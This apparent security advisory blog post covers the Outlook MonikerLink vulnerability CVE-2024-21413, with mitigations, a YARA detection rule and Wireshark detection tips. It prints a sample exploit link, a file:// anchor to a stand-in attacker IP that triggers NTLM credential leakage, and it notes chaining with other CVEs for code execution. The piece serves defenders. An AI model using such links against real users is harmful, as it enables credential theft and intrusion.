Critical Security Alert: Microsoft Outlook Vulnerability (CVE-2024–21413)
Introduction
Every month, Microsoft follows a routine called “Patch Tuesday”. On the second Tuesday at 7:00 PM GMT, they release security updates, revealing vulnerabilities that might have stayed hidden.
As we work on making our digital defenses stronger, we discover long-existing threats in a unique way. Some vulnerabilities, even though they’ve been around for a while, stay hidden until a carefully made patch is applied. This process involves detailed steps like reverse engineering, showing the specific changes in the patch.
But even after the patch is out, there’s still a chance for bad actors to exploit it. This turns the patched vulnerability into a late zero-day weapon, targeting users who haven’t updated yet.
In this landscape, a recent discovery has come to light — a critical vulnerability known as CVE-2024–21413 or the MonikerLink vulnerability in Microsoft Outlook. This finding has raised concerns about potential security risks. Here’s an overview and a comprehensive fix to help keep your Outlook experience safe.
Technical Details:
- Vulnerability Name: CVE-2024–21413 (MonikerLink)
- Severity: Critical
- Affected Software: Microsoft Outlook
- CVSS Score: 9.8 (Common Vulnerability Scoring System)
- Exploit Vector: Remote Code Execution (RCE)
Understanding the MonikerLink Vulnerability:
Outlook, capable of rendering HTML emails and parsing various hyperlinks, also supports Moniker Links. Normally, Outlook will prompt a security warning when external applications are triggered.
The vulnerability arises when modifying the hyperlink to include the ! special character and a specific text in the Moniker Link, effectively bypassing Outlook’s Protected View. For instance:
<p><a href="file://Attacker_IP/test!exploit">Click me</a></p>
Remote Code Execution (RCE) becomes possible because Moniker Links utilize the Component Object Model (COM) on Windows.
How It Works:
Malicious Links: Exploiting a flaw in Outlook’s hyperlink handling, attackers can craft links bypassing security, executing arbitrary code on victims’ systems.
NTLM Credential Theft: Successful exploitation may lead to the theft of NTLM credential information used in Windows environments.
Combined Attacks: Threat actors can combine this vulnerability with others for complete remote code execution, taking control of victims’ machines. You can chain this CVE with CVE-2023–21716 or CVE-2022–30190 to obtain RCE !!!
Requirements:
- The victim’s network needs to allow outbound SMB traffic for external attackers.
- The exploit needs to be designed to work seamlessly with how Word operates as a COM server, ensuring that the malicious actions are carried out effectively.
The distinct requirements reduce the likelihood of successful exploitation of this CVE.
Detection and Identification:
YARA
YARA is a framework dedicated to large-scale pattern matching. Florian Roth created a YARA rule to detect emails containing the file:\\
element in the Moniker Link.
rule EXPL_CVE_2024_21413_Microsoft_Outlook_RCE_Feb24 {
meta:
description = "Detects emails that contain signs of a method to exploit CVE-2024-21413 in Microsoft Outlook"
author = "X__Junior, Florian Roth"
reference = "https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/"
date = "2024-02-17"
modified = "2024-02-19"
score = 75
strings:
$a1 = "Subject: "
$a2 = "Received: "
$xr1 = /file:\/\/\/\\\\[^"']{6,600}\.(docx|txt|pdf|xlsx|pptx|odt|etc|jpg|png|gif|bmp|tiff|svg|mp4|avi|mov|wmv|flv|mkv|mp3|wav|aac|flac|ogg|wma|exe|msi|bat|cmd|ps1|zip|rar|7z|targz|iso|dll|sys|ini|cfg|reg|html|css|java|py|c|cpp|db|sql|mdb|accdb|sqlite|eml|pst|ost|mbox|htm|php|asp|jsp|xml|ttf|otf|woff|woff2|rtf|chm|hta|js|lnk|vbe|vbs|wsf|xls|xlsm|xltm|xlt|doc|docm|dot|dotm)!/
condition:
filesize < 1000KB
and all of ($a*)
and 1 of ($xr*)
}
Wireshark
Cybersecurity analysts can gain insights into communication patterns and potential vulnerabilities. In the case of CVE-2024–21413, examining a packet capture in Wireshark might reveal SMB requests from victims to clients, accompanied by truncated netNTLMv2 hashes. This level of visibility enhances the detection capabilities, allowing security teams to understand the dynamics of the attack and take appropriate countermeasures.
FortiGuard
If you’re utilizing FortiGuard with an up-to-date signature database, ensure to activate deep-inspection. This step allows you to capture and thoroughly inspect the element with IPS for enhanced security measures.
Mitigations and Workarounds:
- Patch Installation: Microsoft has released security updates to address this vulnerability. Ensure your Outlook installation is up-to-date.
- Disable Hyperlinks: Temporarily disable hyperlinks in Outlook emails as a precaution until the patch is applied.
- Best Practices for Users:
· Avoid clicking Random Links: Do not click random links, especially those from unsolicited emails.
· Preview Links Before Clicking: Take a moment to preview links before clicking on them.
· Forward Suspicious Emails: Forward any suspicious emails to the respective department responsible for cybersecurity. - Protected View Bypass: Since this vulnerability bypasses Outlook’s Protected View, there is no way to reconfigure Outlook to prevent this attack.
- Firewall Considerations:
· SMB Protocol: Preventing the SMB protocol entirely may do more harm than good, especially as it is essential for accessing network shares.
· Firewall Level Blocking: Consider blocking at the firewall level, will depend on the organization’s setup.
Conclusion:
CVE-2024–21413 is a significant risk for Outlook users. Applying security updates promptly and following best practices can help mitigate this threat. Cybersecurity is a collective effort — stay vigilant, stay informed, and protect your systems against cyberattacks.
For more information, refer to the official Microsoft Security Update Guide or security blogs below. Stay secure! 🔒
ANSSI / CERT-FR: ANSSI / CERT-FR Alert
Cybermalveillance.gouv.fr: Critical Security Flaw in Microsoft Outlook
CVE.org: CVE-2024–21413 Record
Checkpoint Research: The Risks of the MonikerLink Bug in Microsoft Outlook
TryHackMe: MonikerLink Room
Follow Me on LinkedIn
#CyberSecurity #MicrosoftOutlook #Vulnerability #ThreatAlert#RCE